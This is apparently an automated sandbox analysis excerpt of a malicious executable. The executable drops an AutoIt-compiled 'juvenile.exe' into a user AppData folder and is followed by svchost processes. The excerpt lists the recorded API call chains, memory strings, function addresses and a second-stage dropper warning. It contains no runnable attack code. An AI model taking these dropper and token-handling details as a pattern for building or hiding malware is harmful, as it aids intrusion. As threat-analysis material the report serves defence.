Source: juvenile.exe, 0000000A.00000002.1447557851.000000000097E000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_d67dcb4b-9
Source: juvenile.exe, 0000000A.00000002.1447557851.000000000097E000.00000040.00000001.01000000.00000005.sdmp	String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox\|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_a8ff63bc-2

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_00493742 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	3_2_00493742
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_005000AC NtdllDialogWndProc_W,	3_2_005000AC
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_005000AF NtdllDialogWndProc_W,	3_2_005000AF
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_00500133 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,	3_2_00500133
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_0050044C NtdllDialogWndProc_W,	3_2_0050044C
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004FE9AF NtdllDialogWndProc_W,CallWindowProcW,	3_2_004FE9AF
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004AAAFC NtdllDialogWndProc_W,	3_2_004AAAFC
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004AAB4F NtdllDialogWndProc_W,	3_2_004AAB4F
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004FEC7C NtdllDialogWndProc_W,	3_2_004FEC7C
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004FECD4 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	3_2_004FECD4
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004FEEEB PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	3_2_004FEEEB
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004AB11F NtdllDialogWndProc_W,74E4C8D0,NtdllDialogWndProc_W,	3_2_004AB11F
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004FF1D7 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	3_2_004FF1D7
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004FF2D0 SendMessageW,NtdllDialogWndProc_W,	3_2_004FF2D0
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004FF351 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	3_2_004FF351
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004AB385 GetParent,NtdllDialogWndProc_W,	3_2_004AB385
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004AB55D NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,	3_2_004AB55D
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004FF5DA NtdllDialogWndProc_W,	3_2_004FF5DA
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004FF5AB NtdllDialogWndProc_W,	3_2_004FF5AB
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004FF654 NtdllDialogWndProc_W,	3_2_004FF654
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004FF609 NtdllDialogWndProc_W,	3_2_004FF609
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004FF689 ClientToScreen,NtdllDialogWndProc_W,	3_2_004FF689
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004AB715 NtdllDialogWndProc_W,	3_2_004AB715
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004FF7C3 GetWindowLongW,NtdllDialogWndProc_W,	3_2_004FF7C3
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008D3742 NtdllDefWindowProc_W,KillTimer,SetTimer,RegisterClipboardFormatW,CreatePopupMenu,PostQuitMessage,SetFocus,MoveWindow,	6_2_008D3742
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_009400AC NtdllDialogWndProc_W,	6_2_009400AC
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_009400AF NtdllDialogWndProc_W,	6_2_009400AF
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_00940133 GetSystemMetrics,MoveWindow,SendMessageW,InvalidateRect,SendMessageW,ShowWindow,NtdllDialogWndProc_W,	6_2_00940133
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0094044C NtdllDialogWndProc_W,	6_2_0094044C
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0093E9AF NtdllDialogWndProc_W,CallWindowProcW,	6_2_0093E9AF
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008EAAFC NtdllDialogWndProc_W,	6_2_008EAAFC
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008EAB4F NtdllDialogWndProc_W,	6_2_008EAB4F
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0093ECD4 ReleaseCapture,SetWindowTextW,SendMessageW,NtdllDialogWndProc_W,	6_2_0093ECD4
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0093EC7C NtdllDialogWndProc_W,	6_2_0093EC7C
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0093EEEB PostMessageW,GetFocus,GetDlgCtrlID,_memset,GetMenuItemInfoW,GetMenuItemCount,GetMenuItemID,GetMenuItemInfoW,GetMenuItemInfoW,CheckMenuRadioItem,NtdllDialogWndProc_W,	6_2_0093EEEB
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0093F1D7 GetCursorPos,TrackPopupMenuEx,GetCursorPos,NtdllDialogWndProc_W,	6_2_0093F1D7
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008EB11F NtdllDialogWndProc_W,74E4C8D0,NtdllDialogWndProc_W,	6_2_008EB11F
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0093F2D0 SendMessageW,NtdllDialogWndProc_W,	6_2_0093F2D0
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008EB385 GetParent,NtdllDialogWndProc_W,	6_2_008EB385
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0093F351 DragQueryPoint,SendMessageW,DragQueryFileW,DragQueryFileW,_wcscat,SendMessageW,SendMessageW,SendMessageW,SendMessageW,DragFinish,NtdllDialogWndProc_W,	6_2_0093F351
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0093F5AB NtdllDialogWndProc_W,	6_2_0093F5AB
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0093F5DA NtdllDialogWndProc_W,	6_2_0093F5DA
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008EB55D NtdllDialogWndProc_W,GetClientRect,GetCursorPos,ScreenToClient,	6_2_008EB55D
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0093F689 ClientToScreen,NtdllDialogWndProc_W,	6_2_0093F689
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0093F609 NtdllDialogWndProc_W,	6_2_0093F609
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0093F654 NtdllDialogWndProc_W,	6_2_0093F654
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0093F7C3 GetWindowLongW,NtdllDialogWndProc_W,	6_2_0093F7C3
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008EB715 NtdllDialogWndProc_W,	6_2_008EB715

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_004D6606: CreateFileW,DeviceIoControl,CloseHandle,

3_2_004D6606

Source: C:\Users\user\Desktop\FACT0987789000900.exe

Code function: 3_2_004CACC5 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,75035590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,

3_2_004CACC5

Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004D79D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		3_2_004D79D3
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_009179D3 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		6_2_009179D3

Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004BB043	3_2_004BB043
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004A3200	3_2_004A3200
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004C410F	3_2_004C410F
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004B02A4	3_2_004B02A4
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_0049E3E3	3_2_0049E3E3
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004C038E	3_2_004C038E
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004C467F	3_2_004C467F
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004B06D9	3_2_004B06D9
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004FAACE	3_2_004FAACE
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004C4BEF	3_2_004C4BEF
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004BCCC1	3_2_004BCCC1
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_0049AF50	3_2_0049AF50
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_00496F07	3_2_00496F07
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004AB11F	3_2_004AB11F
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004BD1B9	3_2_004BD1B9
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004F31BC	3_2_004F31BC
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004C724D	3_2_004C724D
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004B123A	3_2_004B123A
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004D13CA	3_2_004D13CA
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004993F0	3_2_004993F0
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004AF563	3_2_004AF563
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004DB6CC	3_2_004DB6CC
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004996C0	3_2_004996C0
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004977B0	3_2_004977B0
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004C79C9	3_2_004C79C9
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004AFA57	3_2_004AFA57
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_00499B60	3_2_00499B60
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004A3B70	3_2_004A3B70
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_00497D19	3_2_00497D19
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004AFE6F	3_2_004AFE6F
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_004B9ED0	3_2_004B9ED0
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_00497FA3	3_2_00497FA3
Source: C:\Users\user\Desktop\FACT0987789000900.exe	Code function: 3_2_0134A1D0	3_2_0134A1D0
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008FB043	6_2_008FB043
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008E3200	6_2_008E3200
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0090410F	6_2_0090410F
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008F02A4	6_2_008F02A4
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0090038E	6_2_0090038E
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008DE3B0	6_2_008DE3B0
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008F06D9	6_2_008F06D9
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0090467F	6_2_0090467F
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0093AACE	6_2_0093AACE
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_00904BEF	6_2_00904BEF
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008FCCC1	6_2_008FCCC1
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008D6F07	6_2_008D6F07
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008DAF50	6_2_008DAF50
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_009331BC	6_2_009331BC
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008FD1B9	6_2_008FD1B9
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008EB11F	6_2_008EB11F
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008F123A	6_2_008F123A
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0090724D	6_2_0090724D
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_009113CA	6_2_009113CA
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008D93F0	6_2_008D93F0
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008EF563	6_2_008EF563
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008D96C0	6_2_008D96C0
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_0091B6CC	6_2_0091B6CC
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008D77B0	6_2_008D77B0
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_009079C9	6_2_009079C9
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008EFA57	6_2_008EFA57
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008D9B60	6_2_008D9B60
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008E3B70	6_2_008E3B70
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008D7D19	6_2_008D7D19
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008F9ED0	6_2_008F9ED0
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008EFE6F	6_2_008EFE6F
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_008D7FA3	6_2_008D7FA3
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 6_2_01569E00	6_2_01569E00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_00408C60	8_2_00408C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0040DC11	8_2_0040DC11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_00407C3F	8_2_00407C3F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_00418CCC	8_2_00418CCC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_00406CA0	8_2_00406CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_004028B0	8_2_004028B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0041A4BE	8_2_0041A4BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_00418244	8_2_00418244
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_00401650	8_2_00401650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_00402F20	8_2_00402F20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_004193C4	8_2_004193C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_00418788	8_2_00418788
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_00402F89	8_2_00402F89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_00402B90	8_2_00402B90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_004073A0	8_2_004073A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_04FFD4EA	8_2_04FFD4EA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_04FF74E0	8_2_04FF74E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_04FFC4E0	8_2_04FFC4E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_04FFA598	8_2_04FFA598
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_04FFD7BD	8_2_04FFD7BD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_04FFD216	8_2_04FFD216
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_04FFCC58	8_2_04FFCC58
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_04FF2EF8	8_2_04FF2EF8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_04FF6EE8	8_2_04FF6EE8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_04FFEEE0	8_2_04FFEEE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_04FFCF30	8_2_04FFCF30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_04FF586F	8_2_04FF586F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_04FFC980	8_2_04FFC980
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_04FFC6A8	8_2_04FFC6A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_04FF4311	8_2_04FF4311
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_04FFEED0	8_2_04FFEED0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_04FFFBA8	8_2_04FFFBA8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_09239578	8_2_09239578
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_09232580	8_2_09232580
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_09235048	8_2_09235048
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_09239C48	8_2_09239C48
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0923CCD0	8_2_0923CCD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_09230B30	8_2_09230B30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_092317B0	8_2_092317B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_09231E98	8_2_09231E98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0923D128	8_2_0923D128
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0923D119	8_2_0923D119
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0923D570	8_2_0923D570
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0923257A	8_2_0923257A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0923D580	8_2_0923D580
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0923D9C8	8_2_0923D9C8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0923D9D8	8_2_0923D9D8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0923F832	8_2_0923F832
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_09235038	8_2_09235038
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_09230006	8_2_09230006
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_09230040	8_2_09230040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0923F840	8_2_0923F840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0923FC98	8_2_0923FC98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0923CCC0	8_2_0923CCC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_09230B20	8_2_09230B20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0923EB29	8_2_0923EB29
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0923EB38	8_2_0923EB38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_09239358	8_2_09239358
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_09238BB1	8_2_09238BB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0923EF80	8_2_0923EF80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0923EF90	8_2_0923EF90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0923179F	8_2_0923179F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0923F3E8	8_2_0923F3E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_09238BC0	8_2_09238BC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0923F3D7	8_2_0923F3D7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0923DE30	8_2_0923DE30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0923DE1F	8_2_0923DE1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0923E27A	8_2_0923E27A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_09231E8A	8_2_09231E8A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0923E288	8_2_0923E288
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0923E6E0	8_2_0923E6E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 8_2_0923E6D0	8_2_0923E6D0
Source: C:\Users\user\AppData\Local\thixolabile\juvenile.exe	Code function: 10_2_012658E8	10_2_012658E8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_00408C60	11_2_00408C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_0040DC11	11_2_0040DC11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_00407C3F	11_2_00407C3F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_00418CCC	11_2_00418CCC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_00406CA0	11_2_00406CA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_004028B0	11_2_004028B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_0041A4BE	11_2_0041A4BE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_00418244	11_2_00418244
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_00401650	11_2_00401650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_00402F20	11_2_00402F20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_004193C4	11_2_004193C4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_00418788	11_2_00418788
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_00402F89	11_2_00402F89
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_00402B90	11_2_00402B90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_004073A0	11_2_004073A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_07CBD7B8	11_2_07CBD7B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_07CB7630	11_2_07CB7630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_07CBA598	11_2_07CBA598
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_07CBD4EB	11_2_07CBD4EB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_07CBC4E0	11_2_07CBC4E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_07CBD20B	11_2_07CBD20B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_07CBCF30	11_2_07CBCF30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_07CBEEE0	11_2_07CBEEE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_07CB6EA8	11_2_07CB6EA8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_07CBCC58	11_2_07CBCC58
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_07CBC980	11_2_07CBC980
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_07CB586F	11_2_07CB586F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_07CBC6A8	11_2_07CBC6A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_07CB4311	11_2_07CB4311
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_07CBEED0	11_2_07CBEED0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_07CB2EF8	11_2_07CB2EF8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_07CBFBA8	11_2_07CBFBA8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086A5048	11_2_086A5048
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086A9C48	11_2_086A9C48
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086A9578	11_2_086A9578
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086A0040	11_2_086A0040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086AF840	11_2_086AF840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086A5038	11_2_086A5038
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086AF832	11_2_086AF832
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086A0013	11_2_086A0013
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086ACCC0	11_2_086ACCC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086ACCD0	11_2_086ACCD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086AFC98	11_2_086AFC98
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086A2572	11_2_086A2572
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086AD570	11_2_086AD570
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086AD128	11_2_086AD128
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086AD119	11_2_086AD119
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086AD9C8	11_2_086AD9C8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086AD9D8	11_2_086AD9D8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086A2580	11_2_086A2580
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086AD580	11_2_086AD580
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086AE27A	11_2_086AE27A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 11_2_086ADE30	11_2_086ADE30
